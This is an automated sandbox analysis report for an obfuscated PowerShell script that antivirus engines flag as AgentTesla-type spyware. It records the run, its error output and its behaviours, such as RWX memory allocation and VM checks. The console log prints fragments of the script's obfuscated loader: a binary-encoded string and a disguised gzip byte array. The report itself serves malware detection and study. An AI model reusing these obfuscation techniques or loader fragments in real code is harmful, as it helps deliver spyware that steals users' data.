Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	March 24, 2023, 9:35 a.m.	March 24, 2023, 9:46 a.m.

Size	946.0KB
Type	ASCII text, with very long lines, with CRLF line terminators
MD5	`bbd04ea795c2f48efea24040f42730e6`
SHA256	`3ed3150d077661daecb4389c94e46d6f247cc6fc7931428e35f85dd2d8abbb47`
CRC32	`15ECDC85`
ssdeep	`12288:T6Pgik9pKI6PM6UtqXHeCzeIZVcGE/AaiK76GC8sQyk7:D`
Yara	None matched

powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy unrestricted -File C:\Users\test22\AppData\Local\Temp\vx9.txt.ps1
840

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
No hosts contacted.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Command line console output was observed (50 out of 12245 events)

Time & API	Arguments	Status	Return
WriteConsoleW March 24, 2023, 9:35 a.m.	buffer: The term 'P' is not recognized as the name of a cmdlet, function, script file, console_handle: 0x00000023	1	1
WriteConsoleW March 24, 2023, 9:35 a.m.	buffer: or operable program. Check the spelling of the name, or if a path was included, console_handle: 0x0000002f	1	1
WriteConsoleW March 24, 2023, 9:35 a.m.	buffer: verify that the path is correct and try again. console_handle: 0x0000003b	1	1
WriteConsoleW March 24, 2023, 9:35 a.m.	buffer: At C:\Users\test22\AppData\Local\Temp\vx9.txt.ps1:1 char:5685 console_handle: 0x00000047	1	1
WriteConsoleW March 24, 2023, 9:35 a.m.	buffer: + $PXDj=('011\|110,01110101,01101110,011\|011,011101\|,01101\|1,01101111,01101110,\| console_handle: 0x00000053	1	1
WriteConsoleW March 24, 2023, 9:35 a.m.	buffer: \|1\|\|0,\|1\|\|0,\|1\|\|0,\|1\|\|0,01111101,\|\|1101,\|\|1010,01111101'.replace('\|','00'))\|P < console_handle: 0x000003a7	1	1
WriteConsoleW March 24, 2023, 9:35 a.m.	buffer: <<< \| %{ [System.Text.encoding]::UTF8.GetString([System.Convert]::ToInt32($_,2 console_handle: 0x000003b3	1	1
WriteConsoleW March 24, 2023, 9:35 a.m.	buffer: )) };P([system.String]::Join('', $PXDj)) console_handle: 0x000003bf	1	1
WriteConsoleW March 24, 2023, 9:35 a.m.	buffer: + CategoryInfo : ObjectNotFound: (P:String) [], CommandNotFoundEx console_handle: 0x000003cb	1	1
WriteConsoleW March 24, 2023, 9:35 a.m.	buffer: ception console_handle: 0x000003d7	1	1
WriteConsoleW March 24, 2023, 9:35 a.m.	buffer: + FullyQualifiedErrorId : CommandNotFoundException console_handle: 0x000003e3	1	1
WriteConsoleW March 24, 2023, 9:35 a.m.	buffer: The term 'P' is not recognized as the name of a cmdlet, function, script file, console_handle: 0x00000403	1	1
WriteConsoleW March 24, 2023, 9:35 a.m.	buffer: or operable program. Check the spelling of the name, or if a path was included, console_handle: 0x0000040f	1	1
WriteConsoleW March 24, 2023, 9:35 a.m.	buffer: verify that the path is correct and try again. console_handle: 0x0000041b	1	1
WriteConsoleW March 24, 2023, 9:35 a.m.	buffer: At C:\Users\test22\AppData\Local\Temp\vx9.txt.ps1:1 char:5766 console_handle: 0x00000427	1	1
WriteConsoleW March 24, 2023, 9:35 a.m.	buffer: + $PXDj=('011\|110,01110101,01101110,011\|011,011101\|,01101\|1,01101111,01101110,\| console_handle: 0x00000433	1	1
WriteConsoleW March 24, 2023, 9:35 a.m.	buffer: \|1\|\|0,\|1\|\|0,\|1\|\|0,\|1\|\|0,01111101,\|\|1101,\|\|1010,01111101'.replace('\|','00'))\|P \| console_handle: 0x00000787	1	1
WriteConsoleW March 24, 2023, 9:35 a.m.	buffer: %{ [System.Text.encoding]::UTF8.GetString([System.Convert]::ToInt32($_,2)) };P console_handle: 0x00000793	1	1
WriteConsoleW March 24, 2023, 9:35 a.m.	buffer: <<<< ([system.String]::Join('', $PXDj)) console_handle: 0x0000079f	1	1
WriteConsoleW March 24, 2023, 9:35 a.m.	buffer: + CategoryInfo : ObjectNotFound: (P:String) [], CommandNotFoundEx console_handle: 0x000007ab	1	1
WriteConsoleW March 24, 2023, 9:35 a.m.	buffer: ception console_handle: 0x000007b7	1	1
WriteConsoleW March 24, 2023, 9:35 a.m.	buffer: + FullyQualifiedErrorId : CommandNotFoundException console_handle: 0x000007c3	1	1
WriteConsoleW March 24, 2023, 9:35 a.m.	buffer: The term 'P' is not recognized as the name of a cmdlet, function, script file, console_handle: 0x0000001b	1	1
WriteConsoleW March 24, 2023, 9:35 a.m.	buffer: or operable program. Check the spelling of the name, or if a path was included, console_handle: 0x00000027	1	1
WriteConsoleW March 24, 2023, 9:35 a.m.	buffer: verify that the path is correct and try again. console_handle: 0x00000033	1	1
WriteConsoleW March 24, 2023, 9:35 a.m.	buffer: At C:\Users\test22\AppData\Local\Temp\vx9.txt.ps1:4 char:484141 console_handle: 0x0000003f	1	1
WriteConsoleW March 24, 2023, 9:35 a.m.	buffer: + [Byte[]]$y74gh00rffd=('R%1F,R%8B,R%08,R%00,R%00,R%00,R%00,R%00,R%04,R%00,R%CC console_handle: 0x0000004b	1	1
WriteConsoleW March 24, 2023, 9:35 a.m.	buffer: ,R%BD,R%09,R%7C,R%5B,R%C5,R%F1,R%38,R%3E,R%BA,R%25,R%5F,R%B1,R%2C,R%C7,R%76,R%7 console_handle: 0x00000057	1	1
WriteConsoleW March 24, 2023, 9:35 a.m.	buffer: C,R%49,R%39,R%51,R%0C,R%31,R%92,R%2C,R%CB,R%92,R%09,R%49,R%2C,R%4B,R%96,R%65,R% console_handle: 0x00000063	1	1
WriteConsoleW March 24, 2023, 9:35 a.m.	buffer: CB,R%B6,R%6C,R%F9,R%E6,R%48,R%74,R%DA,R%B2,R%25,R%3D,R%5B,R%92,R%65,R%2B,R%90,R console_handle: 0x0000006f	1	1
WriteConsoleW March 24, 2023, 9:35 a.m.	buffer: %E0,R%14,R%5A,R%8E,R%42,R%80,R%72,R%94,R%52,R%A0,R%40,R%CB,R%B7,R%9C,R%2D,R%05, console_handle: 0x0000007b	1	1
WriteConsoleW March 24, 2023, 9:35 a.m.	buffer: R%4A,R%81,R%DE,R%2D,R%ED,R%B7,R%94,R%A3,R%69,R%A1,R%05,R%CA,R%5D,R%7A,R%70,R%7D console_handle: 0x00000087	1	1
WriteConsoleW March 24, 2023, 9:35 a.m.	buffer: ,R%4B,R%2F,R%4A,R%DB,R%2F,R%0D,R%FF,R%99,R%7D,R%4F,R%B2,R%EC,R%04,R%E8,R%AF,R%F console_handle: 0x00000093	1	1
WriteConsoleW March 24, 2023, 9:35 a.m.	buffer: D,R%7F,R%7E,R%9F,R%9F,R%92,R%37,R%6F,R%67,R%77,R%76,R%76,R%76,R%76,R%76,R%76,R% console_handle: 0x0000009f	1	1
WriteConsoleW March 24, 2023, 9:35 a.m.	buffer: 76,R%DF,R%7B,R%49,R%DF,R%E4,R%65,R%20,R%01,R%00,R%29,R%5E,R%EF,R%BF,R%0F,R%F0,R console_handle: 0x000000ab	1	1
WriteConsoleW March 24, 2023, 9:35 a.m.	buffer: %00,R%F0,R%BF,R%3D,R%F0,R%D1,R%BF,R%65,R%BC,R%CA,R%B4,R%0F,R%95,R%C1,R%7D,R%AA, console_handle: 0x000000b7	1	1
WriteConsoleW March 24, 2023, 9:35 a.m.	buffer: R%C7,R%37,R%3E,R%20,R%F2,R%3C,R%BE,R%71,R%78,R%3A,R%9A,R%D2,R%CD,R%25,R%B9,R%A9 console_handle: 0x000000c3	1	1
WriteConsoleW March 24, 2023, 9:35 a.m.	buffer: ,R%A4,R%3F,R%AE,R%0B,R%FA,R%13,R%09,R%2E,R%AD,R%0B,R%84,R%75,R%C9,R%85,R%84,R%2 console_handle: 0x000000cf	1	1
WriteConsoleW March 24, 2023, 9:35 a.m.	buffer: E,R%9A,R%D0,R%39,R%06,R%7C,R%BA,R%38,R%17,R%0A,R%37,R%97,R%96,R%16,R%6D,R%11,R% console_handle: 0x000000db	1	1
WriteConsoleW March 24, 2023, 9:35 a.m.	buffer: 78,R%78,R%9D,R%00,R%1E,R%91,R%04,R%FE,R%72,R%B0,R%2C,R%94,R%E3,R%FB,R%32,R%94,R console_handle: 0x000000e7	1	1
WriteConsoleW March 24, 2023, 9:35 a.m.	buffer: %6D,R%2C,R%16,R%29,R%01,R%1E,R%13,R%01,R%C8,R%F9,R%BC,R%5D,R%6F,R%60,R%5A,R%47, console_handle: 0x000000f3	1	1
WriteConsoleW March 24, 2023, 9:35 a.m.	buffer: R%29,R%31,R%2F,R%9D,R%8E,R%4F,R%4A,R%85,R%3A,R%B9,R%3B,R%EC,R%11,R%F3,R%24,R%F8 console_handle: 0x000000ff	1	1
WriteConsoleW March 24, 2023, 9:35 a.m.	buffer: ,R%93,R%C0,R%9E,R%8F,R%03,R%94,R%B3,R%BF,R%2B,R%F7,R%FC,R%8D,R%FD,R%FE,R%F0,R%B console_handle: 0x0000010b	1	1
WriteConsoleW March 24, 2023, 9:35 a.m.	buffer: A,R%08,R%7A,R%81,R%E7,R%EB,R%90,R%1C,R%A7,R%93,R%3A,R%31,R%94,R%E0,R%ED,R%5E,R% console_handle: 0x00000117	1	1
WriteConsoleW March 24, 2023, 9:35 a.m.	buffer: A4,R%AB,R%FF,R%17,R%74,R%B2,R%52,R%0F,R%40,R%59,R%80,R%2A,R%11,R%EF,R%2E,R%C0,R console_handle: 0x00000123	1	1
WriteConsoleW March 24, 2023, 9:35 a.m.	buffer: %9B,R%D3,R%E1,R%A5,R%34,R%DE,R%1D,R%3F,R%16,R%FA,R%45,R%7D,R%15,R%1F,R%C3,R%62, console_handle: 0x0000012f	1	1
WriteConsoleW March 24, 2023, 9:35 a.m.	buffer: R%5F,R%73,R%32,R%95,R%0C,R%12,R%9D,R%84,R%97,R%91,R%75,R%F4,R%09,R%D1,R%2A,R%BA console_handle: 0x0000013b	1	1
WriteConsoleW March 24, 2023, 9:35 a.m.	buffer: ,R%3D,R%F8,R%B7,R%39,R%19,R%8E,R%71,R%48,R%58,R%22,R%C8,R%CC,R%78,R%FD,R%EC,R%1 console_handle: 0x00000147	1	1
WriteConsoleW March 24, 2023, 9:35 a.m.	buffer: 8,R%3A,R%FB,R%31,R%62,R%BE,R%C1,R%D3,R%74,R%33,R%EE,R%32,R%D0,R%8D,R%A2,R%FE,R% console_handle: 0x00000153	1	1
WriteConsoleW March 24, 2023, 9:35 a.m.	buffer: 87,R%01,R%F2,R%35,R%EF,R%00,R%78,R%F4,R%14,R%D1,R%DA,R%6A,R%1F,R%F8,R%6B,R%D6,R console_handle: 0x0000015f	1	1

Uses Windows APIs to generate a cryptographic key (6 events)

Time & API	Arguments	Status	Return
CryptExportKey March 24, 2023, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00395de0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 24, 2023, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00395de0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 24, 2023, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00395de0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 24, 2023, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00395de0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 24, 2023, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00395de0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 24, 2023, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00395de0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx March 24, 2023, 9:35 a.m.		1	1	0

Allocates read-write-execute memory (usually to unpack itself) (12 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory March 24, 2023, 9:35 a.m.	process_identifier: 840 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0250b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 24, 2023, 9:35 a.m.	process_identifier: 840 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0251f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 24, 2023, 9:35 a.m.	process_identifier: 840 region_size: 2162688 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06230000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 24, 2023, 9:35 a.m.	process_identifier: 840 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06400000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 24, 2023, 9:35 a.m.	process_identifier: 840 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06401000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 24, 2023, 9:35 a.m.	process_identifier: 840 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06402000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 24, 2023, 9:35 a.m.	process_identifier: 840 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06403000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 24, 2023, 9:35 a.m.	process_identifier: 840 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06404000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 24, 2023, 9:35 a.m.	process_identifier: 840 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024e9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 24, 2023, 9:35 a.m.	process_identifier: 840 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05500000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 24, 2023, 9:35 a.m.	process_identifier: 840 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05502000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 24, 2023, 9:35 a.m.	process_identifier: 840 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05503000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

File has been identified by 5 AntiVirus engines on VirusTotal as malicious (5 events)

Cyren	PSH/Agent.HA
Symantec	Trojan Horse
ESET-NOD32	MSIL/Spy.AgentTesla.D
Kaspersky	HEUR:Trojan.PowerShell.Kryptik.gen
Google	Detected

vx9.txt.ps1

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All